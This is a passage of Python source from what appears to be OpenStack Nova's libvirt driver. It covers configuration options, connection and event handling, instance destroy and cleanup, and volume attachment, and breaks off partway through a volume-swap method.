cfg.BoolOpt('libvirt_inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('libvirt_inject_key',
default=True,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('libvirt_inject_partition',
default=1,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.StrOpt('libvirt_vif_driver',
default='nova.virt.libvirt.vif.LibvirtGenericVIFDriver',
help='The libvirt VIF driver to configure the VIFs.'),
cfg.ListOpt('libvirt_volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'iser=nova.virt.libvirt.volume.LibvirtISERVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('libvirt_disk_prefix',
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on libvirt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('libvirt_wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.BoolOpt('libvirt_nonblocking',
default=True,
help='Use a separated OS thread pool to realize non-blocking'
' libvirt calls'),
cfg.StrOpt('libvirt_cpu_mode',
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If libvirt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('libvirt_cpu_model',
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'libvirt_cpu_mode="custom" and libvirt_type="kvm|qemu"'),
cfg.StrOpt('libvirt_snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('vcpu_pin_set',
help='Which pcpus can be used by vcpus of instance '
'e.g: "4-12,^8,15"'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
MAX_CONSOLE_BYTES = 100 * unit.Ki
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
tpool.Proxy.__str__ = str_method
tpool.Proxy.__repr__ = repr_method
patch_tpool_proxy()
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
LIBVIRT_POWER_STATE = {
VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
VIR_DOMAIN_RUNNING: power_state.RUNNING,
# NOTE(maoy): The DOMAIN_BLOCKED state is only valid in Xen.
# It means that the VM is running and the vCPU is idle. So,
# we map it to RUNNING
VIR_DOMAIN_BLOCKED: power_state.RUNNING,
VIR_DOMAIN_PAUSED: power_state.PAUSED,
# NOTE(maoy): The libvirt API doc says that DOMAIN_SHUTDOWN
# means the domain is being shut down. So technically the domain
# is still running. SHUTOFF is the real powered off state.
# But we will map both to SHUTDOWN anyway.
# http://libvirt.org/html/libvirt-libvirt.html
VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
VIR_DOMAIN_CRASHED: power_state.CRASHED,
VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
MIN_LIBVIRT_VERSION = (0, 9, 6)
# When the above version matches/exceeds this version
# delete it & corresponding code using it
MIN_LIBVIRT_HOST_CPU_VERSION = (0, 9, 10)
MIN_LIBVIRT_CLOSE_CALLBACK_VERSION = (1, 0, 1)
MIN_LIBVIRT_DEVICE_CALLBACK_VERSION = (1, 1, 1)
# Live snapshot requirements
REQ_HYPERVISOR_LIVESNAPSHOT = "QEMU"
MIN_LIBVIRT_LIVESNAPSHOT_VERSION = (1, 0, 0)
MIN_QEMU_LIVESNAPSHOT_VERSION = (1, 3, 0)
# block size tuning requirements
MIN_LIBVIRT_BLOCKIO_VERSION = (0, 10, 2)
# BlockJobInfo management requirement
MIN_LIBVIRT_BLOCKJOBINFO_VERSION = (1, 1, 1)
def libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
class LibvirtDriver(driver.ComputeDriver):
capabilities = {
"has_imagecache": True,
"supports_recreate": True,
}
def __init__(self, virtapi, read_only=False):
super(LibvirtDriver, self).__init__(virtapi)
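# libvirt is imported lazily so this module can still be imported (e.g. by
# tests or tooling) on machines without the libvirt python bindings.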
global libvirt
if libvirt is None:
libvirt = __import__('libvirt')
self._host_state = None
self._initiator = None
self._fc_wwnns = None
self._fc_wwpns = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._caps = None
self._vcpu_total = 0
self.read_only = read_only
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self.virtapi,
get_connection=self._get_connection)
vif_class = importutils.import_class(CONF.libvirt_vif_driver)
self.vif_driver = vif_class(self._get_connection)
self.volume_drivers = driver.driver_dict_from_config(
CONF.libvirt_volume_drivers, self)
self.dev_filter = pci_whitelist.get_pci_devices_filter()
self._event_queue = None
self._disk_cachemode = None
self.image_cache_manager = imagecache.ImageCacheManager()
self.image_backend = imagebackend.Backend(CONF.use_cow_images)
self.disk_cachemodes = {}
self.valid_cachemodes = ["default",
"none",
"writethrough",
"writeback",
"directsync",
"unsafe",
]
for mode_str in CONF.disk_cachemodes:
disk_type, sep, cache_mode = mode_str.partition('=')
if cache_mode not in self.valid_cachemodes:
LOG.warn(_('Invalid cachemode %(cache_mode)s specified '
'for disk type %(disk_type)s.'),
{'cache_mode': cache_mode, 'disk_type': disk_type})
continue
self.disk_cachemodes[disk_type] = cache_mode
self._volume_api = volume.API()
@property
def disk_cachemode(self):
if self._disk_cachemode is None:
# We prefer 'none' for consistent performance, host crash
# safety & migration correctness by avoiding host page cache.
# Some filesystems (eg GlusterFS via FUSE) don't support
# O_DIRECT though. For those we fallback to 'writethrough'
# which gives host crash safety, and is safe for migration
# provided the filesystem is cache coherent (cluster filesystems
# typically are, but things like NFS are not).
self._disk_cachemode = "none"
if not self._supports_direct_io(CONF.instances_path):
self._disk_cachemode = "writethrough"
return self._disk_cachemode
@property
def host_state(self):
if not self._host_state:
self._host_state = HostState(self)
return self._host_state
def set_cache_mode(self, conf):
"""Set cache mode on LibvirtConfigGuestDisk object."""
try:
source_type = conf.source_type
driver_cache = conf.driver_cache
except AttributeError:
return
cache_mode = self.disk_cachemodes.get(source_type,
driver_cache)
conf.driver_cache = cache_mode
@staticmethod
def _has_min_version(conn, lv_ver=None, hv_ver=None, hv_type=None):
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if libvirt_version < utils.convert_version_to_int(lv_ver):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if hypervisor_version < utils.convert_version_to_int(hv_ver):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._has_min_version(self._conn, lv_ver, hv_ver, hv_type)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self.queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread.
"""
if self._event_queue is None:
LOG.debug(_("Event loop thread is not active, "
"discarding event %s") % event)
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
self.emit_event(event)
except native_Queue.Empty:
pass
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = eventlet_util.__original_socket__(socket.AF_INET,
socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug(_("Starting native event thread"))
event_thread = native_threading.Thread(target=self._native_thread)
event_thread.setDaemon(True)
event_thread.start()
LOG.debug(_("Starting green dispatch thread"))
eventlet.spawn(self._dispatch_thread)
def init_host(self, host):
libvirt.registerErrorHandler(libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
if not self.has_min_version(MIN_LIBVIRT_VERSION):
major = MIN_LIBVIRT_VERSION[0]
minor = MIN_LIBVIRT_VERSION[1]
micro = MIN_LIBVIRT_VERSION[2]
LOG.error(_('Nova requires libvirt version '
'%(major)i.%(minor)i.%(micro)i or greater.'),
{'major': major, 'minor': minor, 'micro': micro})
self._init_events()
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
wrapped_conn = self._wrapped_conn
if not wrapped_conn or not self._test_connection(wrapped_conn):
LOG.debug(_('Connecting to libvirt: %s'), self.uri())
try:
if not CONF.libvirt_nonblocking:
wrapped_conn = self._connect(self.uri(),
self.read_only)
else:
wrapped_conn = tpool.proxy_call(
(libvirt.virDomain, libvirt.virConnect),
self._connect, self.uri(), self.read_only)
finally:
# Enabling the compute service, in case it was disabled
# since the connection was successful.
is_connected = bool(wrapped_conn)
self.set_host_enabled(CONF.host, is_connected)
self._wrapped_conn = wrapped_conn
try:
LOG.debug(_("Registering for lifecycle events %s") %
str(self))
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warn(_("URI %(uri)s does not support events: %(error)s"),
{'uri': self.uri(), 'error': e})
if self._has_min_version(wrapped_conn,
MIN_LIBVIRT_CLOSE_CALLBACK_VERSION):
try:
LOG.debug(_("Registering for connection events: %s") %
str(self))
wrapped_conn.registerCloseCallback(
self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warn(_("URI %(uri)s does not support connection"
" events: %(error)s"),
{'uri': self.uri(), 'error': e})
return wrapped_conn
_conn = property(_get_connection)
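# Every access to self._conn goes through _get_connection above, which
# re-validates the cached libvirt connection and reconnects if it has dropped.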
def _close_callback(self, conn, reason, opaque):
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
_error = _("Connection to libvirt lost: %s") % reason
LOG.warn(_error)
self._wrapped_conn = None
# Disable compute service to avoid
# new instances being scheduled on this host.
self.set_host_enabled(CONF.host, _error)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug(_('Connection to libvirt broke'))
return False
raise
@staticmethod
def uri():
if CONF.libvirt_type == 'uml':
uri = CONF.libvirt_uri or 'uml:///system'
elif CONF.libvirt_type == 'xen':
uri = CONF.libvirt_uri or 'xen:///'
elif CONF.libvirt_type == 'lxc':
uri = CONF.libvirt_uri or 'lxc:///'
else:
uri = CONF.libvirt_uri or 'qemu:///system'
return uri
@staticmethod
def _connect(uri, read_only):
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
LOG.warning(
_("Can not handle authentication request for %d credentials")
% len(creds))
raise exception.NovaException(
_("Can not handle authentication request for %d credentials")
% len(creds))
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
_connect_auth_cb,
None]
try:
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
return libvirt.openAuth(uri, auth, flags)
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=LibvirtDriver.get_host_ip_addr(),
method='_connect',
reason=ex)
notifier.get_notifier('compute').error(
nova_context.get_admin_context(),
'compute.libvirt.error', payload)
raise exception.HypervisorUnavailable(host=CONF.host)
def get_num_instances(self):
"""Efficient override of base instance_exists method."""
return self._conn.numOfDomains()
def instance_exists(self, instance_name):
"""Efficient override of base instance_exists method."""
try:
self._lookup_by_name(instance_name)
return True
except exception.NovaException:
return False
# TODO(Shrews): Remove when libvirt Bugzilla bug # 836647 is fixed.
def list_instance_ids(self):
if self._conn.numOfDomains() == 0:
return []
return self._conn.listDomainsID()
def list_instances(self):
names = []
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._lookup_by_id(domain_id)
names.append(domain.name())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
# extend instance list to contain also defined domains
names.extend([vm for vm in self._conn.listDefinedDomains()
if vm not in names])
return names
def list_instance_uuids(self):
uuids = set()
for domain_id in self.list_instance_ids():
try:
# We skip domains with ID 0 (hypervisors).
if domain_id != 0:
domain = self._lookup_by_id(domain_id)
uuids.add(domain.UUIDString())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
# extend instance list to contain also defined domains
for domain_name in self._conn.listDefinedDomains():
try:
uuids.add(self._lookup_by_name(domain_name).UUIDString())
except exception.InstanceNotFound:
# Ignore deleted instance while listing
continue
return list(uuids)
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
for vif in network_info:
self.vif_driver.plug(instance, vif)
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
for vif in network_info:
self.vif_driver.unplug(instance, vif)
def _destroy(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
# If the instance is already terminated, we're still happy
# Otherwise, destroy it
old_domid = -1
if virt_dom is not None:
try:
old_domid = virt_dom.ID()
virt_dom.destroy()
except libvirt.libvirtError as e:
is_okay = False
errcode = e.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_INVALID:
# If the instance is already shut off, we get this:
# Code=55 Error=Requested operation is not valid:
# domain is not running
(state, _max_mem, _mem, _cpus, _t) = virt_dom.info()
state = LIBVIRT_POWER_STATE[state]
if state == power_state.SHUTDOWN:
is_okay = True
elif errcode == libvirt.VIR_ERR_OPERATION_TIMEOUT:
LOG.warn(_("Cannot destroy instance, operation time out"),
instance=instance)
reason = _("operation time out")
raise exception.InstancePowerOffFailure(reason=reason)
if not is_okay:
with excutils.save_and_reraise_exception():
LOG.error(_('Error from libvirt during destroy. '
'Code=%(errcode)s Error=%(e)s'),
{'errcode': errcode, 'e': e},
instance=instance)
def _wait_for_destroy(expected_domid):
"""Called at an interval until the VM is gone."""
# NOTE(vish): If the instance disappears during the destroy
# we ignore it so the cleanup can still be
# attempted because we would prefer destroy to
# never fail.
try:
dom_info = self.get_info(instance)
state = dom_info['state']
new_domid = dom_info['id']
except exception.InstanceNotFound:
LOG.error(_("During wait destroy, instance disappeared."),
instance=instance)
raise loopingcall.LoopingCallDone()
if state == power_state.SHUTDOWN:
LOG.info(_("Instance destroyed successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
# NOTE(wangpan): If the instance was booted again after destroy,
# this may be an endless loop, so check the id of
# domain here, if it changed and the instance is
# still running, we should destroy it again.
# see https://bugs.launchpad.net/nova/+bug/1111213 for more details
if new_domid != expected_domid:
LOG.info(_("Instance may be started again."),
instance=instance)
kwargs['is_running'] = True
raise loopingcall.LoopingCallDone()
kwargs = {'is_running': False}
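# kwargs is shared with the _wait_for_destroy closure above so the looping
# call can report whether the domain reappeared while we were destroying it.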
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_destroy,
old_domid)
timer.start(interval=0.5).wait()
if kwargs['is_running']:
LOG.info(_("Going to destroy instance again."), instance=instance)
self._destroy(instance)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True):
self._destroy(instance)
self._cleanup(context, instance, network_info, block_device_info,
destroy_disks)
def _undefine_domain(self, instance):
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
virt_dom = None
if virt_dom:
try:
try:
virt_dom.undefineFlags(
libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE)
except libvirt.libvirtError:
LOG.debug(_("Error from libvirt during undefineFlags."
" Retrying with undefine"), instance=instance)
virt_dom.undefine()
except AttributeError:
# NOTE(vish): Older versions of libvirt don't support
# undefine flags, so attempt to do the
# right thing.
try:
if virt_dom.hasManagedSaveImage(0):
virt_dom.managedSaveRemove(0)
except AttributeError:
pass
virt_dom.undefine()
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
errcode = e.get_error_code()
LOG.error(_('Error from libvirt during undefine. '
'Code=%(errcode)s Error=%(e)s') %
{'errcode': errcode, 'e': e}, instance=instance)
def _cleanup(self, context, instance, network_info, block_device_info,
destroy_disks):
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
retry = True
while retry:
try:
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
except libvirt.libvirtError as e:
try:
state = self.get_info(instance)['state']
except exception.InstanceNotFound:
state = power_state.SHUTDOWN
if state != power_state.SHUTDOWN:
LOG.warn(_("Instance may be still running, destroy "
"it again."), instance=instance)
self._destroy(instance)
else:
retry = False
errcode = e.get_error_code()
LOG.error(_('Error from libvirt during unfilter. '
'Code=%(errcode)s Error=%(e)s') %
{'errcode': errcode, 'e': e},
instance=instance)
reason = "Error unfiltering instance."
raise exception.InstanceTerminationFailure(reason=reason)
except Exception:
retry = False
raise
else:
retry = False
# FIXME(wangpan): if the instance is booted again here, such as when
# the soft reboot operation boots it here, it will
# become "running deleted", should we check and destroy
# it at the end of this method?
# NOTE(vish): we disconnect from volumes regardless
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
if ('data' in connection_info and
'volume_id' in connection_info['data']):
volume_id = connection_info['data']['volume_id']
encryption = encryptors.get_encryption_metadata(
context, self._volume_api, volume_id, connection_info)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
if destroy_disks:
#NOTE(GuanQiang): teardown lxc container to avoid resource leak
if CONF.libvirt_type == 'lxc':
inst_path = libvirt_utils.get_instance_path(instance)
container_dir = os.path.join(inst_path, 'rootfs')
container_root_device = instance.get('root_device_name')
disk.teardown_container(container_dir, container_root_device)
self._delete_instance_files(instance)
self._cleanup_lvm(instance)
#NOTE(haomai): destroy volumes if needed
if CONF.libvirt_images_type == 'rbd':
self._cleanup_rbd(instance)
def _cleanup_rbd(self, instance):
pool = CONF.libvirt_images_rbd_pool
volumes = libvirt_utils.list_rbd_volumes(pool)
pattern = instance['uuid']
def belongs_to_instance(disk):
return disk.startswith(pattern)
volumes = filter(belongs_to_instance, volumes)
if volumes:
libvirt_utils.remove_rbd_volumes(pool, *volumes)
def _cleanup_lvm(self, instance):
"""Delete all LVM disks for given instance object."""
disks = self._lvm_disks(instance)
if disks:
libvirt_utils.remove_logical_volumes(*disks)
def _lvm_disks(self, instance):
"""Returns all LVM disks for given instance object."""
if CONF.libvirt_images_volume_group:
vg = os.path.join('/dev', CONF.libvirt_images_volume_group)
if not os.path.exists(vg):
return []
pattern = '%s_' % instance['name']
def belongs_to_instance(disk):
return disk.startswith(pattern)
def fullpath(name):
return os.path.join(vg, name)
logical_volumes = libvirt_utils.list_logical_volumes(vg)
disk_names = filter(belongs_to_instance, logical_volumes)
disks = map(fullpath, disk_names)
return disks
return []
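# Illustrative only: assuming CONF.libvirt_images_volume_group is
# 'nova-volumes' and the instance is named 'instance-00000001', the
# method above would return paths such as
#
#     ['/dev/nova-volumes/instance-00000001_disk',
#      '/dev/nova-volumes/instance-00000001_disk.local']
#
# (the exact names depend on the image backend's naming scheme).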
def get_volume_connector(self, instance):
if not self._initiator:
self._initiator = libvirt_utils.get_iscsi_initiator()
if not self._initiator:
LOG.debug(_('Could not determine iscsi initiator name'),
instance=instance)
if not self._fc_wwnns:
self._fc_wwnns = libvirt_utils.get_fc_wwnns()
if not self._fc_wwnns or len(self._fc_wwnns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide node names'),
instance=instance)
if not self._fc_wwpns:
self._fc_wwpns = libvirt_utils.get_fc_wwpns()
if not self._fc_wwpns or len(self._fc_wwpns) == 0:
LOG.debug(_('Could not determine fibre channel '
'world wide port names'),
instance=instance)
connector = {'ip': CONF.my_ip,
'host': CONF.host}
if self._initiator:
connector['initiator'] = self._initiator
if self._fc_wwnns and self._fc_wwpns:
connector["wwnns"] = self._fc_wwnns
connector["wwpns"] = self._fc_wwpns
return connector
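# Illustrative only: on a host with an iSCSI initiator and FC HBAs
# configured, the connector returned above would look roughly like the
# hypothetical dict below (all values invented):
#
#     {'ip': '192.0.2.10',
#      'host': 'compute-01',
#      'initiator': 'iqn.1994-05.com.example:host1',
#      'wwnns': ['20000024ff45f4a2'],
#      'wwpns': ['21000024ff45f4a2']}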
def _cleanup_resize(self, instance, network_info):
target = libvirt_utils.get_instance_path(instance) + "_resize"
if os.path.exists(target):
shutil.rmtree(target)
if instance['host'] != CONF.host:
self._undefine_domain(instance)
self.unplug_vifs(instance, network_info)
self.firewall_driver.unfilter_instance(instance, network_info)
def volume_driver_method(self, method_name, connection_info,
*args, **kwargs):
driver_type = connection_info.get('driver_volume_type')
if driver_type not in self.volume_drivers:
raise exception.VolumeDriverNotFound(driver_type=driver_type)
driver = self.volume_drivers[driver_type]
method = getattr(driver, method_name)
return method(connection_info, *args, **kwargs)
def _get_volume_encryptor(self, connection_info, encryption):
encryptor = encryptors.get_volume_encryptor(connection_info,
**encryption)
return encryptor
def attach_volume(self, context, connection_info, instance, mountpoint,
encryption=None):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
# NOTE(cfb): If the volume has a custom block size, check that
# we are using QEMU/KVM and libvirt >= 0.10.2. The presence of
# a block size is considered mandatory by cinder, so we fail if
# we can't honor the request.
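# Illustrative only: a connection_info carrying a custom block size
# might look roughly like the hypothetical dict below (keys other than
# the block sizes vary by volume driver; all values invented):
#
#     {'driver_volume_type': 'iscsi',
#      'data': {'volume_id': '<uuid>',
#               'logical_block_size': '4096',
#               'physical_block_size': '4096'}}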
data = {}
if ('data' in connection_info):
data = connection_info['data']
if ('logical_block_size' in data or 'physical_block_size' in data):
if CONF.libvirt_type != "kvm" and CONF.libvirt_type != "qemu":
msg = _("Volume sets block size, but the current "
"libvirt hypervisor '%s' does not support custom "
"block size") % CONF.libvirt_type
raise exception.InvalidHypervisorType(msg)
if not self.has_min_version(MIN_LIBVIRT_BLOCKIO_VERSION):
ver = ".".join([str(x) for x in MIN_LIBVIRT_BLOCKIO_VERSION])
msg = _("Volume sets block size, but libvirt '%s' or later is "
"required.") % ver
raise exception.Invalid(msg)
conf = self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.set_cache_mode(conf)
try:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
# cache device_path in connection_info -- required by encryptors
if 'data' in connection_info:
connection_info['data']['device_path'] = conf.source_path
if encryption:
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.attach_volume(context, **encryption)
virt_dom.attachDeviceFlags(conf.to_xml(), flags)
except Exception as ex:
if isinstance(ex, libvirt.libvirtError):
errcode = ex.get_error_code()
if errcode == libvirt.VIR_ERR_OPERATION_FAILED:
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
raise exception.DeviceIsBusy(device=disk_dev)
with excutils.save_and_reraise_exception():
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
def _swap_volume(self, domain, disk_path, new_path):
"""Swap existing disk with a new block device."""
# Save a copy of the domain's running XML file
xml = domain.XMLDesc(0)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# Start copy with VIR_DOMAIN_REBASE_REUSE_EXT flag to
# allow writing to existing external volume file
